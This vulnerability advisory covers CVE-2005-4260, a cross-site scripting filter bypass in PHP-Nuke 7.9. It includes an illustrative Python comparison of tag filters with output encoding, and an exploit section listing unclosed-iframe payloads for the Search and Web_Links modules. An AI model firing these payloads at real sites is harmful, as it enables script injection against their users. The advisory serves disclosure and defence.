PHPNuke Content Filtering Bypass Vulnerability

Vulnerability ID: 1109462
Vulnerability type: Cross-site scripting
Published: 2005-12-14
Updated: 2006-06-09
CVE ID: CVE-2005-4260
CNNVD-ID: CNNVD-200512-316
Platform: PHP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/26817
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-316
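|Vulnerability details
An interpretation conflict exists in includes/mainfile.php in PHP-Nuke 7.9 and later versions. A remote attacker can carry out cross-site scripting attacks by replacing the ">" in a tag with "<", which bypasses the regular expressions that sanitize the data but is automatically corrected by many web browsers.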
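The interpretation conflict described above, as an added example that is not PHP-Nuke's code: a blacklist that only recognises a tag once its closing ">" is present, compared with a check that treats any tag opener as markup and with HTML output encoding. The pattern `NAIVE_TAG`, the function names and the sample strings are assumptions constructed for illustration; the real expressions in includes/mainfile.php are not shown on this page.

```python
import html
import re

# Hypothetical blacklist filter (an assumption, not PHP-Nuke's real pattern):
# it only recognises a tag when the closing ">" is present.
NAIVE_TAG = re.compile(r"<\s*(script|iframe|object|embed|style)\b[^>]*>", re.I)

# Stricter detector: a "<" followed by a tag name counts as markup even if
# it is never closed, because browsers repair unterminated tags themselves.
TAG_OPEN = re.compile(r"<\s*/?\s*[a-z!]", re.I)


def naive_filter_blocks(value: str) -> bool:
    """Return True when the closed-tag blacklist would reject the value."""
    return NAIVE_TAG.search(value) is not None


def strict_filter_blocks(value: str) -> bool:
    """Return True when the value contains anything that can open a tag."""
    return TAG_OPEN.search(value) is not None


def render_safely(value: str) -> str:
    """HTML output encoding: the mitigation that does not depend on filtering."""
    return html.escape(value, quote=True)


# Constructed sample inputs, shaped like the insert string quoted on this page.
SAMPLES = {
    "closed": "<iframe src=http://www.example.com?phpnuke79 >",
    "unclosed": "<iframe src=http://www.example.com?phpnuke79 <",
    "benign": "price < 10 and quality > 5",
}


def report() -> dict:
    """Run every sample through both filters and the encoder."""
    return {
        name: (naive_filter_blocks(v), strict_filter_blocks(v), render_safely(v))
        for name, v in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, (naive, strict, encoded) in report().items():
        print(f"{name:9} naive={naive!s:5} strict={strict!s:5} encoded={encoded}")
```

The filter and the browser disagree about where a tag ends, so the durable mitigation is encoding on output rather than a stricter pattern on input.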
|Exploit
source: http://www.securityfocus.com/bid/15855/info

PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.

PHPNuke 7.9 and prior versions are reported to be vulnerable. 

URI:
http://www.example.com/[DIR]/modules.php?name=Search
Insert:
<iframe src=http://www.example.com?phpnuke79 <

URI:
http://www.example.com/[DIR]//modules.php?name=Web_Links
Insert:
<iframe src=http://www.example.com?phpnuke79 <
|References

Source: BID
Name: 15855
Link: http://www.securityfocus.com/bid/15855
Source: BUGTRAQ
Name: 20051220 Re: XSS bypass in PHPNuke - FIX?
Link: http://www.securityfocus.com/archive/1/archive/1/419991/100/0/threaded
Source: BUGTRAQ
Name: 20051214 Bypass XSS filter in PHPNUKE 7.9=>x
Link: http://www.securityfocus.com/archive/1/archive/1/419496/100/0/threaded